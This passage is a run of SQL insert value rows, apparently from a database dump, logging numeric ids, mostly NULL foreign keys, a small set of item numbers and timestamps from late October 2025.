(20920, NULL, NULL, 2061, 1, '2025-10-19 09:52:33'),
(20921, NULL, NULL, 2059, 1, '2025-10-19 11:28:37'),
(20922, NULL, NULL, 2055, 1, '2025-10-19 11:42:41'),
(20923, NULL, NULL, 2062, 1, '2025-10-19 11:45:06'),
(20924, NULL, NULL, 2064, 1, '2025-10-19 12:00:41'),
(20925, NULL, NULL, 2064, 1, '2025-10-19 14:12:25'),
(20926, NULL, NULL, 2060, 1, '2025-10-19 14:20:45'),
(20927, NULL, NULL, 2064, 1, '2025-10-19 14:32:30'),
(20928, NULL, NULL, 2061, 1, '2025-10-19 18:53:05'),
(20929, NULL, NULL, 2064, 1, '2025-10-19 19:19:53'),
(20930, NULL, NULL, 2055, 1, '2025-10-19 19:26:26'),
(20931, NULL, NULL, 2064, 1, '2025-10-19 19:44:51'),
(20932, NULL, NULL, 2054, 1, '2025-10-19 21:50:25'),
(20933, NULL, NULL, 2058, 1, '2025-10-19 22:16:27'),
(20934, NULL, NULL, 2055, 1, '2025-10-19 23:37:35'),
(20935, NULL, NULL, 2062, 1, '2025-10-20 00:50:54'),
(20936, NULL, NULL, 2064, 1, '2025-10-20 01:26:51'),
(20937, NULL, NULL, 2060, 1, '2025-10-20 02:00:43'),
(20938, NULL, NULL, 2062, 1, '2025-10-20 03:17:22'),
(20939, NULL, NULL, 2064, 1, '2025-10-20 03:41:21'),
(20940, NULL, NULL, 2064, 1, '2025-10-20 03:44:58'),
(20941, NULL, NULL, 2060, 1, '2025-10-20 04:59:59'),
(20942, NULL, NULL, 2064, 1, '2025-10-20 05:40:09'),
(20943, NULL, NULL, 2063, 1, '2025-10-20 06:06:23'),
(20944, NULL, NULL, 2060, 1, '2025-10-20 06:43:32'),
(20945, NULL, NULL, 2060, 1, '2025-10-20 07:04:57'),
(20946, NULL, NULL, 2058, 1, '2025-10-20 09:25:43'),
(20947, NULL, NULL, 2064, 1, '2025-10-20 09:53:26'),
(20948, NULL, NULL, 2064, 1, '2025-10-20 09:53:26'),
(20949, NULL, NULL, 2064, 1, '2025-10-20 09:53:33'),
(20950, NULL, NULL, 2064, 1, '2025-10-20 09:53:33'),
(20951, NULL, NULL, 2058, 1, '2025-10-20 09:53:35'),
(20952, NULL, NULL, 2055, 1, '2025-10-20 09:53:35'),
(20953, NULL, NULL, 2064, 1, '2025-10-20 09:53:36'),
(20954, NULL, NULL, 2064, 1, '2025-10-20 09:53:37'),
(20955, NULL, NULL, 2061, 1, '2025-10-20 09:53:37'),
(20956, NULL, NULL, 2061, 1, '2025-10-20 09:53:40'),
(20957, NULL, NULL, 2059, 1, '2025-10-20 09:53:40'),
(20958, NULL, NULL, 2064, 1, '2025-10-20 09:53:42'),
(20959, NULL, NULL, 2062, 1, '2025-10-20 09:53:42'),
(20960, NULL, NULL, 2060, 1, '2025-10-20 09:53:42'),
(20961, NULL, NULL, 2055, 1, '2025-10-20 09:53:43'),
(20962, NULL, NULL, 2058, 1, '2025-10-20 09:53:43'),
(20963, NULL, NULL, 2063, 1, '2025-10-20 09:53:43'),
(20964, NULL, NULL, 2063, 1, '2025-10-20 09:53:45'),
(20965, NULL, NULL, 2062, 1, '2025-10-20 09:53:45'),
(20966, NULL, NULL, 2064, 1, '2025-10-20 09:53:46'),
(20967, NULL, NULL, 2058, 1, '2025-10-20 09:53:48'),
(20968, NULL, NULL, 2061, 1, '2025-10-20 09:53:48'),
(20969, NULL, NULL, 2064, 1, '2025-10-20 09:53:49'),
(20970, NULL, NULL, 2061, 1, '2025-10-20 09:53:49'),
(20971, NULL, NULL, 2064, 1, '2025-10-20 09:53:51'),
(20972, NULL, NULL, 2055, 1, '2025-10-20 09:53:52'),
(20973, NULL, NULL, 2060, 1, '2025-10-20 09:53:52'),
(20974, NULL, NULL, 2055, 1, '2025-10-20 09:53:53'),
(20975, NULL, NULL, 2062, 1, '2025-10-20 09:53:53'),
(20976, NULL, NULL, 2059, 1, '2025-10-20 09:53:53'),
(20977, NULL, NULL, 2058, 1, '2025-10-20 09:53:54'),
(20978, NULL, NULL, 2063, 1, '2025-10-20 09:53:54'),
(20979, NULL, NULL, 2063, 1, '2025-10-20 09:53:56'),
(20980, NULL, NULL, 2062, 1, '2025-10-20 09:53:56'),
(20981, NULL, NULL, 2061, 1, '2025-10-20 09:53:57'),
(20982, NULL, NULL, 2064, 1, '2025-10-20 09:53:57'),
(20983, NULL, NULL, 2064, 1, '2025-10-20 09:53:57'),
(20984, NULL, NULL, 2064, 1, '2025-10-20 09:53:58'),
(20985, NULL, NULL, 2055, 1, '2025-10-20 09:54:00'),
(20986, NULL, NULL, 2060, 1, '2025-10-20 09:54:00'),
(20987, NULL, NULL, 2058, 1, '2025-10-20 09:54:00'),
(20988, NULL, NULL, 2062, 1, '2025-10-20 09:54:00'),
(20989, NULL, NULL, 2063, 1, '2025-10-20 09:54:00'),
(20990, NULL, NULL, 2059, 1, '2025-10-20 09:54:00'),
(20991, NULL, NULL, 2062, 1, '2025-10-20 09:54:02'),
(20992, NULL, NULL, 2063, 1, '2025-10-20 09:54:02'),
(20993, NULL, NULL, 2053, 1, '2025-10-20 09:54:02'),
(20994, NULL, NULL, 2054, 1, '2025-10-20 09:54:03'),
(20995, NULL, NULL, 2053, 1, '2025-10-20 09:54:03'),
(20996, NULL, NULL, 2053, 1, '2025-10-20 09:54:03'),
(20997, NULL, NULL, 2064, 1, '2025-10-20 09:54:04'),
(20998, NULL, NULL, 2064, 1, '2025-10-20 09:54:04'),
(20999, NULL, NULL, 2064, 1, '2025-10-20 09:54:05'),
(21000, NULL, NULL, 2060, 1, '2025-10-20 09:54:05'),
(21001, NULL, NULL, 2064, 1, '2025-10-20 09:54:05'),
(21002, NULL, NULL, 2053, 1, '2025-10-20 09:54:06'),
(21003, NULL, NULL, 2064, 1, '2025-10-20 09:54:06'),
(21004, NULL, NULL, 2054, 1, '2025-10-20 09:54:07'),
(21005, NULL, NULL, 2064, 1, '2025-10-20 09:54:07'),
(21006, NULL, NULL, 2064, 1, '2025-10-20 09:54:07'),
(21007, NULL, NULL, 2053, 1, '2025-10-20 09:54:07'),
(21008, NULL, NULL, 2064, 1, '2025-10-20 09:54:07'),
(21009, NULL, NULL, 2060, 1, '2025-10-20 09:54:08'),
(21010, NULL, NULL, 2064, 1, '2025-10-20 09:54:10'),
(21011, NULL, NULL, 2053, 1, '2025-10-20 09:54:10'),
(21012, NULL, NULL, 2053, 1, '2025-10-20 09:54:13'),
(21013, NULL, NULL, 2054, 1, '2025-10-20 09:54:13'),
(21014, NULL, NULL, 2064, 1, '2025-10-20 09:54:14'),
(21015, NULL, NULL, 2064, 1, '2025-10-20 09:54:15'),
(21016, NULL, NULL, 2064, 1, '2025-10-20 09:54:19'),
(21017, NULL, NULL, 2062, 1, '2025-10-20 10:10:51'),
(21018, NULL, NULL, 2063, 1, '2025-10-20 11:14:03'),
(21019, NULL, NULL, 2055, 1, '2025-10-20 11:15:16'),
(21020, NULL, NULL, 2064, 1, '2025-10-20 11:22:24'),
(21021, NULL, NULL, 2060, 1, '2025-10-20 12:05:16'),
(21022, NULL, NULL, 2062, 1, '2025-10-20 12:33:08'),
(21023, NULL, NULL, 2054, 1, '2025-10-20 12:37:58'),
(21024, NULL, NULL, 2062, 1, '2025-10-20 13:50:21'),
(21025, NULL, NULL, 2064, 1, '2025-10-20 13:50:49'),
(21026, NULL, NULL, 2053, 1, '2025-10-20 13:52:24'),
(21027, NULL, NULL, 2064, 1, '2025-10-20 13:53:33'),
(21028, NULL, NULL, 2061, 1, '2025-10-20 13:54:26'),
(21029, NULL, NULL, 2058, 1, '2025-10-20 13:56:04'),
(21030, NULL, NULL, 2054, 1, '2025-10-20 13:59:10'),
(21031, NULL, NULL, 2060, 1, '2025-10-20 14:10:41'),
(21032, NULL, NULL, 2054, 1, '2025-10-20 14:25:28'),
(21033, NULL, NULL, 2061, 1, '2025-10-20 15:01:39'),
(21034, NULL, NULL, 2064, 1, '2025-10-20 15:35:33'),
(21035, NULL, NULL, 2064, 1, '2025-10-20 15:43:00'),
(21036, NULL, NULL, 2062, 1, '2025-10-20 16:28:50'),
(21037, NULL, NULL, 2059, 1, '2025-10-20 16:46:41'),
(21038, NULL, NULL, 2053, 1, '2025-10-20 17:25:57'),
(21039, NULL, NULL, 2063, 1, '2025-10-20 17:26:29'),
(21040, NULL, NULL, 2061, 1, '2025-10-20 18:58:29'),
(21041, NULL, NULL, 2064, 1, '2025-10-20 20:05:15'),
(21042, NULL, NULL, 2058, 1, '2025-10-20 20:32:44'),
(21043, NULL, NULL, 2054, 1, '2025-10-20 20:34:45'),
(21044, NULL, NULL, 2061, 1, '2025-10-20 20:45:22'),
(21045, NULL, NULL, 2058, 1, '2025-10-20 20:49:45'),
(21046, NULL, NULL, 2062, 1, '2025-10-20 22:09:19'),
(21047, NULL, NULL, 2062, 1, '2025-10-20 23:32:44'),
(21048, 3855, NULL, 2064, 1, '2025-10-21 00:10:19'),
(21050, NULL, NULL, 2064, 1, '2025-10-21 01:37:48'),
(21051, NULL, NULL, 2054, 1, '2025-10-21 01:40:52'),
(21052, NULL, NULL, 2061, 1, '2025-10-21 02:09:03'),
(21053, NULL, NULL, 2064, 1, '2025-10-21 02:26:03'),
(21054, NULL, NULL, 2060, 1, '2025-10-21 02:39:45'),
(21055, NULL, NULL, 2054, 1, '2025-10-21 03:24:05'),
(21056, NULL, NULL, 2060, 1, '2025-10-21 04:57:22'),
(21057, NULL, NULL, 2064, 1, '2025-10-21 05:28:34'),
(21058, NULL, NULL, 2063, 1, '2025-10-21 05:35:01'),
(21059, NULL, NULL, 2060, 1, '2025-10-21 05:55:36'),
(21060, NULL, NULL, 2060, 1, '2025-10-21 06:12:21'),
(21061, NULL, NULL, 2061, 1, '2025-10-21 06:17:42'),
(21062, NULL, NULL, 2062, 1, '2025-10-21 06:28:38'),
(21063, NULL, NULL, 2061, 1, '2025-10-21 07:18:42'),
(21064, NULL, NULL, 2064, 1, '2025-10-21 08:09:41'),
(21065, NULL, NULL, 2058, 1, '2025-10-21 08:13:28'),
(21066, NULL, NULL, 2055, 1, '2025-10-21 08:58:06'),
(21067, NULL, NULL, 2055, 1, '2025-10-21 09:39:07'),
(21068, NULL, NULL, 2063, 1, '2025-10-21 09:58:21'),
(21069, NULL, NULL, 2055, 1, '2025-10-21 12:03:04'),
(21070, NULL, NULL, 2054, 1, '2025-10-21 12:12:20'),
(21071, NULL, NULL, 2061, 1, '2025-10-21 13:16:51'),
(21072, NULL, NULL, 2054, 1, '2025-10-21 14:06:22'),
(21073, NULL, NULL, 2062, 1, '2025-10-21 14:38:25'),
(21074, NULL, NULL, 2059, 1, '2025-10-21 14:53:13'),
(21075, NULL, NULL, 2054, 1, '2025-10-21 15:42:37'),
(21076, NULL, NULL, 2054, 1, '2025-10-21 16:28:37'),
(21077, NULL, NULL, 2061, 1, '2025-10-21 16:28:37'),
(21078, NULL, NULL, 2064, 1, '2025-10-21 16:28:37'),
(21079, NULL, NULL, 2059, 1, '2025-10-21 16:28:37'),
(21080, NULL, NULL, 2060, 1, '2025-10-21 16:28:37'),
(21081, NULL, NULL, 2058, 1, '2025-10-21 16:28:37'),
(21082, NULL, NULL, 2062, 1, '2025-10-21 16:28:37'),
(21083, NULL, NULL, 2055, 1, '2025-10-21 16:28:37'),
(21084, NULL, NULL, 2063, 1, '2025-10-21 16:28:37'),
(21085, NULL, NULL, 2064, 1, '2025-10-21 17:38:15'),
(21086, NULL, NULL, 2064, 1, '2025-10-21 17:46:17'),
(21087, NULL, NULL, 2059, 1, '2025-10-21 17:56:36'),
(21088, NULL, NULL, 2058, 1, '2025-10-21 18:09:04'),
(21089, NULL, NULL, 2064, 1, '2025-10-21 18:41:43'),
(21090, NULL, NULL, 2064, 1, '2025-10-21 18:48:47'),
(21091, NULL, NULL, 2060, 1, '2025-10-21 18:49:02'),
(21092, NULL, NULL, 2060, 1, '2025-10-21 21:30:45'),
(21093, NULL, NULL, 2058, 1, '2025-10-22 00:02:40'),
(21094, NULL, NULL, 2063, 1, '2025-10-22 01:15:08'),
(21095, NULL, NULL, 2055, 1, '2025-10-22 01:59:40'),
(21096, NULL, NULL, 2060, 1, '2025-10-22 02:00:21'),
(21097, NULL, NULL, 2064, 1, '2025-10-22 02:34:32'),
(21098, NULL, NULL, 2054, 1, '2025-10-22 02:55:49'),
(21099, NULL, NULL, 2061, 1, '2025-10-22 04:54:09'),
(21100, NULL, NULL, 2058, 1, '2025-10-22 05:09:57'),
(21101, NULL, NULL, 2054, 1, '2025-10-22 05:10:12'),
(21102, NULL, NULL, 2061, 1, '2025-10-22 06:22:07'),
(21103, NULL, NULL, 2059, 1, '2025-10-22 06:23:22'),
(21104, NULL, NULL, 2062, 1, '2025-10-22 06:56:05'),
(21105, NULL, NULL, 2064, 1, '2025-10-22 08:26:56'),
(21106, NULL, NULL, 2054, 1, '2025-10-22 09:53:22'),
(21107, NULL, NULL, 2060, 1, '2025-10-22 11:22:53'),
(21108, NULL, NULL, 2058, 1, '2025-10-22 11:54:38'),
(21109, NULL, NULL, 2054, 1, '2025-10-22 12:29:14'),
(21110, NULL, NULL, 2064, 1, '2025-10-22 13:33:11'),
(21111, NULL, NULL, 2054, 1, '2025-10-22 13:41:01'),
(21112, NULL, NULL, 2060, 1, '2025-10-22 13:50:29'),
(21113, NULL, NULL, 2062, 1, '2025-10-22 15:05:42'),
(21114, NULL, NULL, 2060, 1, '2025-10-22 15:42:11'),
(21115, NULL, NULL, 2064, 1, '2025-10-22 15:42:40'),
(21116, NULL, NULL, 2064, 1, '2025-10-22 17:37:52'),
(21117, NULL, NULL, 2060, 1, '2025-10-22 21:07:46'),
(21118, NULL, NULL, 2054, 1, '2025-10-22 21:32:56'),
(21119, NULL, NULL, 2060, 1, '2025-10-22 21:52:14'),
(21120, NULL, NULL, 2058, 1, '2025-10-22 23:28:16'),
(21121, NULL, NULL, 2060, 1, '2025-10-23 00:17:26'),
(21122, NULL, NULL, 2064, 1, '2025-10-23 00:18:01'),
(21123, NULL, NULL, 2063, 1, '2025-10-23 00:54:20'),
(21124, NULL, NULL, 2062, 1, '2025-10-23 01:31:07'),
(21125, NULL, NULL, 2054, 1, '2025-10-23 01:34:24'),
(21126, NULL, NULL, 2063, 1, '2025-10-23 01:49:42'),
(21127, NULL, NULL, 2055, 1, '2025-10-23 01:56:33'),
(21128, NULL, NULL, 2053, 1, '2025-10-23 02:37:56'),
(21129, NULL, NULL, 2059, 1, '2025-10-23 02:52:27'),
(21130, NULL, NULL, 2061, 1, '2025-10-23 04:01:12'),
(21131, NULL, NULL, 2062, 1, '2025-10-23 04:23:36'),
(21132, NULL, NULL, 2061, 1, '2025-10-23 04:53:26'),
(21133, NULL, NULL, 2054, 1, '2025-10-23 05:08:08'),
(21134, NULL, NULL, 2058, 1, '2025-10-23 05:17:18'),
(21135, NULL, NULL, 2060, 1, '2025-10-23 05:28:31'),
(21136, NULL, NULL, 2064, 1, '2025-10-23 05:40:28'),
(21137, NULL, NULL, 2062, 1, '2025-10-23 06:27:22'),
(21138, NULL, NULL, 2059, 1, '2025-10-23 06:45:15'),
(21139, NULL, NULL, 2064, 1, '2025-10-23 08:12:33'),
(21140, NULL, NULL, 2054, 1, '2025-10-23 08:46:24'),
(21141, NULL, NULL, 2064, 1, '2025-10-23 14:22:54'),
(21142, NULL, NULL, 2054, 1, '2025-10-23 14:38:13'),
(21143, NULL, NULL, 2060, 1, '2025-10-23 15:28:04'),
(21144, NULL, NULL, 2064, 1, '2025-10-23 17:38:26'),
(21145, NULL, NULL, 2059, 1, '2025-10-23 17:47:42'),
(21146, NULL, NULL, 2064, 1, '2025-10-23 17:52:12'),
(21147, NULL, NULL, 2060, 1, '2025-10-23 22:34:37'),
(21148, NULL, NULL, 2062, 1, '2025-10-23 22:43:24'),
(21149, NULL, NULL, 2063, 1, '2025-10-23 22:43:33'),
(21150, NULL, NULL, 2061, 1, '2025-10-23 22:43:36'),
(21151, NULL, NULL, 2058, 1, '2025-10-24 00:02:02'),
(21152, NULL, NULL, 2064, 1, '2025-10-24 00:19:39'),
(21153, NULL, NULL, 2055, 1, '2025-10-24 01:40:32'),
(21154, NULL, NULL, 2063, 1, '2025-10-24 01:59:23'),
(21155, NULL, NULL, 2060, 1, '2025-10-24 04:29:13'),
(21156, NULL, NULL, 2061, 1, '2025-10-24 04:54:00'),
(21157, NULL, NULL, 2054, 1, '2025-10-24 05:05:36'),
(21158, NULL, NULL, 2060, 1, '2025-10-24 05:10:27'),
(21159, NULL, NULL, 2054, 1, '2025-10-24 05:20:06'),
(21160, NULL, NULL, 2062, 1, '2025-10-24 06:28:32'),
(21161, NULL, NULL, 2059, 1, '2025-10-24 06:48:51'),
(21162, NULL, NULL, 2058, 1, '2025-10-24 08:18:02'),
(21163, NULL, NULL, 2053, 1, '2025-10-24 08:18:44'),
(21164, NULL, NULL, 2064, 1, '2025-10-24 09:18:09'),
(21165, NULL, NULL, 2060, 1, '2025-10-24 11:32:01'),
(21166, NULL, NULL, 2054, 1, '2025-10-24 11:57:59'),
(21167, NULL, NULL, 2060, 1, '2025-10-24 13:03:24'),
(21168, NULL, NULL, 2064, 1, '2025-10-24 13:07:04'),
(21169, NULL, NULL, 2064, 1, '2025-10-24 17:16:59'),
(21170, NULL, NULL, 2060, 1, '2025-10-24 17:31:46'),
(21171, NULL, NULL, 2064, 1, '2025-10-24 17:40:03'),
(21172, NULL, NULL, 2063, 1, '2025-10-24 17:58:19'),
(21173, NULL, NULL, 2064, 1, '2025-10-24 21:53:43'),
(21174, NULL, NULL, 2060, 1, '2025-10-24 22:18:47'),
(21175, NULL, NULL, 2060, 1, '2025-10-24 23:30:05'),
(21176, NULL, NULL, 2058, 1, '2025-10-25 00:03:00'),
(21177, NULL, NULL, 2054, 1, '2025-10-25 01:28:31'),
(21178, NULL, NULL, 2055, 1, '2025-10-25 01:35:44'),
(21179, NULL, NULL, 2063, 1, '2025-10-25 02:04:56'),
(21180, NULL, NULL, 2060, 1, '2025-10-25 02:27:08'),
(21181, NULL, NULL, 2064, 1, '2025-10-25 02:27:10'),
(21182, NULL, NULL, 2058, 1, '2025-10-25 04:27:49'),
(21183, NULL, NULL, 2064, 1, '2025-10-25 04:50:18'),
(21184, NULL, NULL, 2061, 1, '2025-10-25 04:50:52'),
(21185, NULL, NULL, 2054, 1, '2025-10-25 05:07:31'),
(21186, NULL, NULL, 2062, 1, '2025-10-25 06:28:42'),
(21187, NULL, NULL, 2054, 1, '2025-10-25 06:30:51'),
(21188, NULL, NULL, 2064, 1, '2025-10-25 06:31:32'),
(21189, NULL, NULL, 2059, 1, '2025-10-25 06:46:20'),
(21190, NULL, NULL, 2060, 1, '2025-10-25 06:53:46'),
(21191, NULL, NULL, 2064, 1, '2025-10-25 07:19:08'),
(21192, NULL, NULL, 2060, 1, '2025-10-25 09:28:59'),
(21193, NULL, NULL, 2055, 1, '2025-10-25 12:25:22'),
(21194, NULL, NULL, 2063, 1, '2025-10-25 12:27:07'),
(21195, NULL, NULL, 2058, 1, '2025-10-25 12:28:25'),
(21196, NULL, NULL, 2064, 1, '2025-10-25 13:45:28'),
(21197, NULL, NULL, 2054, 1, '2025-10-25 14:20:38'),
(21198, NULL, NULL, 2061, 1, '2025-10-25 14:40:08'),
(21199, NULL, NULL, 2060, 1, '2025-10-25 14:40:15'),
(21200, NULL, NULL, 2062, 1, '2025-10-25 14:51:15'),
(21201, NULL, NULL, 2064, 1, '2025-10-25 15:07:37'),
(21202, NULL, NULL, 2059, 1, '2025-10-25 15:16:14'),
(21203, NULL, NULL, 2054, 1, '2025-10-25 15:22:24'),
(21204, NULL, NULL, 2064, 1, '2025-10-25 15:49:07'),
(21205, NULL, NULL, 2064, 1, '2025-10-25 17:38:12'),
(21206, NULL, NULL, 2063, 1, '2025-10-25 18:19:05'),
(21207, NULL, NULL, 2060, 1, '2025-10-25 18:24:47'),
(21208, NULL, NULL, 2060, 1, '2025-10-25 18:44:05'),
(21209, NULL, NULL, 2061, 1, '2025-10-25 19:30:55'),
(21210, NULL, NULL, 2061, 1, '2025-10-25 20:37:58'),
(21211, NULL, NULL, 2054, 1, '2025-10-25 21:31:51'),
(21212, NULL, NULL, 2062, 1, '2025-10-25 21:36:14'),
(21213, NULL, NULL, 2054, 1, '2025-10-25 21:40:00'),
(21214, NULL, NULL, 2064, 1, '2025-10-25 21:49:00'),
(21215, NULL, NULL, 2060, 1, '2025-10-25 22:12:06'),
(21216, NULL, NULL, 2059, 1, '2025-10-25 23:16:33'),
(21217, NULL, NULL, 2058, 1, '2025-10-26 00:00:56'),
(21218, NULL, NULL, 2058, 1, '2025-10-26 00:41:41'),
(21219, NULL, NULL, 2060, 1, '2025-10-26 01:33:19'),
(21220, NULL, NULL, 2055, 1, '2025-10-26 01:38:12'),
(21221, NULL, NULL, 2063, 1, '2025-10-26 01:59:30'),
(21222, NULL, NULL, 2059, 1, '2025-10-26 03:02:53'),
(21223, NULL, NULL, 2064, 1, '2025-10-26 04:10:24'),
(21224, NULL, NULL, 2059, 1, '2025-10-26 04:12:14'),
(21225, NULL, NULL, 2064, 1, '2025-10-26 04:25:04'),
(21226, NULL, NULL, 2063, 1, '2025-10-26 04:35:53'),
(21227, NULL, NULL, 2064, 1, '2025-10-26 04:50:18'),
(21228, NULL, NULL, 2061, 1, '2025-10-26 04:50:39'),
(21229, NULL, NULL, 2055, 1, '2025-10-26 04:54:07'),
(21230, NULL, NULL, 2054, 1, '2025-10-26 05:05:10'),
(21231, NULL, NULL, 2054, 1, '2025-10-26 05:06:27'),
(21232, NULL, NULL, 2064, 1, '2025-10-26 05:32:56'),
(21233, NULL, NULL, 2062, 1, '2025-10-26 06:29:37'),
(21234, NULL, NULL, 2059, 1, '2025-10-26 06:45:15'),
(21235, NULL, NULL, 2060, 1, '2025-10-26 07:07:56'),
(21236, NULL, NULL, 2059, 1, '2025-10-26 07:08:00'),
(21237, 3931, NULL, 2064, 1, '2025-10-26 07:47:05'),
(21238, NULL, NULL, 2060, 1, '2025-10-26 08:31:20'),
(21239, NULL, NULL, 2063, 1, '2025-10-26 08:40:36'),
(21240, NULL, NULL, 2058, 1, '2025-10-26 08:46:36'),
(21241, NULL, NULL, 2060, 1, '2025-10-26 09:01:23'),
(21242, NULL, NULL, 2058, 1, '2025-10-26 09:03:54'),
(21243, NULL, NULL, 2055, 1, '2025-10-26 09:45:07'),
(21244, NULL, NULL, 2064, 1, '2025-10-26 09:54:01'),
(21245, NULL, NULL, 2054, 1, '2025-10-26 10:19:12'),
(21246, NULL, NULL, 2061, 1, '2025-10-26 10:58:50'),
(21247, NULL, NULL, 2059, 1, '2025-10-26 11:08:30'),
(21248, NULL, NULL, 2061, 1, '2025-10-26 11:21:26'),
(21249, NULL, NULL, 2062, 1, '2025-10-26 11:39:21'),
(21250, NULL, NULL, 2054, 1, '2025-10-26 12:47:49'),
(21251, NULL, NULL, 2064, 1, '2025-10-26 12:56:33'),
(21252, NULL, NULL, 2059, 1, '2025-10-26 13:02:54'),
(21253, NULL, NULL, 2064, 1, '2025-10-26 13:15:58'),
(21254, NULL, NULL, 2061, 1, '2025-10-26 15:25:55'),
(21255, NULL, NULL, 2064, 1, '2025-10-26 16:02:16'),
(21256, NULL, NULL, 2064, 1, '2025-10-26 16:03:37'),
(21257, NULL, NULL, 2064, 1, '2025-10-26 16:03:45'),
(21258, NULL, NULL, 2064, 1, '2025-10-26 16:36:22'),
(21259, NULL, NULL, 2060, 1, '2025-10-26 16:39:02'),
(21260, NULL, NULL, 2059, 1, '2025-10-26 16:48:01'),
(21261, NULL, NULL, 2058, 1, '2025-10-26 16:58:07'),
(21262, NULL, NULL, 2064, 1, '2025-10-26 17:37:44'),
(21263, NULL, NULL, 2058, 1, '2025-10-26 17:56:00'),
(21264, NULL, NULL, 2054, 1, '2025-10-26 18:28:04'),
(21265, NULL, NULL, 2060, 1, '2025-10-26 19:32:27'),
(21266, NULL, NULL, 2054, 1, '2025-10-26 20:18:45'),
(21267, NULL, NULL, 2054, 1, '2025-10-26 21:49:04'),
(21268, NULL, NULL, 2060, 1, '2025-10-26 22:19:14'),
(21269, NULL, NULL, 2058, 1, '2025-10-27 00:10:07'),
(21270, NULL, NULL, 2064, 1, '2025-10-27 00:37:26'),
(21271, NULL, NULL, 2055, 1, '2025-10-27 01:40:26'),
(21272, NULL, NULL, 2063, 1, '2025-10-27 01:59:55'),
(21273, NULL, NULL, 2060, 1, '2025-10-27 03:33:05'),
(21274, NULL, NULL, 2064, 1, '2025-10-27 04:29:05'),
(21275, NULL, NULL, 2061, 1, '2025-10-27 04:54:31'),
(21276, NULL, NULL, 2054, 1, '2025-10-27 05:05:38'),
(21277, NULL, NULL, 2053, 1, '2025-10-27 05:44:07'),
(21278, NULL, NULL, 2054, 1, '2025-10-27 06:10:34'),
(21279, NULL, NULL, 2060, 1, '2025-10-27 06:14:51'),
(21280, NULL, NULL, 2062, 1, '2025-10-27 06:27:57'),
(21281, NULL, NULL, 2059, 1, '2025-10-27 06:43:16'),
(21282, NULL, NULL, 2054, 1, '2025-10-27 07:35:11'),
(21283, NULL, NULL, 2064, 1, '2025-10-27 07:50:04'),
(21284, NULL, NULL, 2060, 1, '2025-10-27 08:21:23'),
(21285, NULL, NULL, 2064, 1, '2025-10-27 08:23:16'),
(21286, NULL, NULL, 2055, 1, '2025-10-27 10:35:59'),
(21287, NULL, NULL, 2054, 1, '2025-10-27 14:13:05'),
(21288, NULL, NULL, 2059, 1, '2025-10-27 14:33:47'),
(21289, NULL, NULL, 2064, 1, '2025-10-27 14:49:59'),
(21290, NULL, NULL, 2055, 1, '2025-10-27 16:02:46'),
(21291, NULL, NULL, 2064, 1, '2025-10-27 16:16:35'),
(21292, NULL, NULL, 2059, 1, '2025-10-27 16:19:41'),
(21293, NULL, NULL, 2058, 1, '2025-10-27 16:20:49'),
(21294, NULL, NULL, 2054, 1, '2025-10-27 16:20:49'),
(21295, NULL, NULL, 2061, 1, '2025-10-27 16:22:20'),
(21296, NULL, NULL, 2062, 1, '2025-10-27 16:22:20'),
(21297, NULL, NULL, 2060, 1, '2025-10-27 16:29:15'),
(21298, NULL, NULL, 2064, 1, '2025-10-27 16:48:40'),
(21299, NULL, NULL, 2062, 1, '2025-10-27 17:07:09'),
(21300, NULL, NULL, 2064, 1, '2025-10-27 17:41:30'),
(21301, NULL, NULL, 2060, 1, '2025-10-27 18:03:21'),
(21302, NULL, NULL, 2062, 1, '2025-10-27 18:07:48'),
(21303, NULL, NULL, 2060, 1, '2025-10-27 19:01:30'),
(21304, NULL, NULL, 2054, 1, '2025-10-27 19:43:46'),
(21305, NULL, NULL, 2058, 1, '2025-10-27 19:43:49'),
(21306, NULL, NULL, 2060, 1, '2025-10-27 21:58:10'),
(21307, NULL, NULL, 2060, 1, '2025-10-27 23:16:49'),
(21308, NULL, NULL, 2064, 1, '2025-10-27 23:58:08'),
(21309, NULL, NULL, 2058, 1, '2025-10-28 00:01:32'),
(21310, NULL, NULL, 2055, 1, '2025-10-28 01:44:04'),
(21311, NULL, NULL, 2063, 1, '2025-10-28 02:01:49'),
(21312, NULL, NULL, 2054, 1, '2025-10-28 02:46:11'),
(21313, NULL, NULL, 2060, 1, '2025-10-28 03:58:23'),
(21314, NULL, NULL, 2061, 1, '2025-10-28 04:52:12'),
(21315, NULL, NULL, 2054, 1, '2025-10-28 05:07:05'),
(21316, NULL, NULL, 2054, 1, '2025-10-28 05:20:34'),
(21317, NULL, NULL, 2053, 1, '2025-10-28 06:03:35'),
(21318, NULL, NULL, 2062, 1, '2025-10-28 06:29:00'),
(21319, NULL, NULL, 2059, 1, '2025-10-28 06:52:10'),
(21320, NULL, NULL, 2064, 1, '2025-10-28 07:16:42'),
(21321, NULL, NULL, 2058, 1, '2025-10-28 07:51:25'),
(21322, NULL, NULL, 2060, 1, '2025-10-28 07:51:25'),
(21323, NULL, NULL, 2059, 1, '2025-10-28 12:03:19'),
(21324, NULL, NULL, 2064, 1, '2025-10-28 12:45:04'),
(21325, NULL, NULL, 2060, 1, '2025-10-28 14:14:05'),
(21326, NULL, NULL, 2060, 1, '2025-10-28 14:15:01'),
(21327, NULL, NULL, 2060, 1, '2025-10-28 19:16:25'),
(21328, NULL, NULL, 2059, 1, '2025-10-28 20:05:46'),
(21329, NULL, NULL, 2054, 1, '2025-10-28 20:07:52'),
(21330, NULL, NULL, 2064, 1, '2025-10-28 21:01:48'),
(21331, NULL, NULL, 2063, 1, '2025-10-28 21:36:47'),
(21332, NULL, NULL, 2061, 1, '2025-10-28 22:36:21'),
(21333, NULL, NULL, 2062, 1, '2025-10-28 22:54:03'),
(21334, NULL, NULL, 2054, 1, '2025-10-29 00:43:27'),
(21335, NULL, NULL, 2055, 1, '2025-10-29 00:51:20'),
(21336, NULL, NULL, 2064, 1, '2025-10-29 00:58:29'),
(21337, NULL, NULL, 2054, 1, '2025-10-29 02:07:22'),
(21338, NULL, NULL, 2064, 1, '2025-10-29 03:50:15'),
(21339, NULL, NULL, 2064, 1, '2025-10-29 05:56:01'),
(21340, NULL, NULL, 2053, 1, '2025-10-29 07:26:15'),
(21341, NULL, NULL, 2054, 1, '2025-10-29 08:07:55'),
(21342, NULL, NULL, 2060, 1, '2025-10-29 08:32:38'),
(21343, NULL, NULL, 2063, 1, '2025-10-29 10:43:50'),
(21344, NULL, NULL, 2054, 1, '2025-10-29 12:19:03'),
(21345, NULL, NULL, 2058, 1, '2025-10-29 13:04:14'),
(21346, NULL, NULL, 2064, 1, '2025-10-29 13:36:32'),
(21347, NULL, NULL, 2064, 1, '2025-10-29 14:31:39'),
(21348, NULL, NULL, 2060, 1, '2025-10-29 14:34:15'),
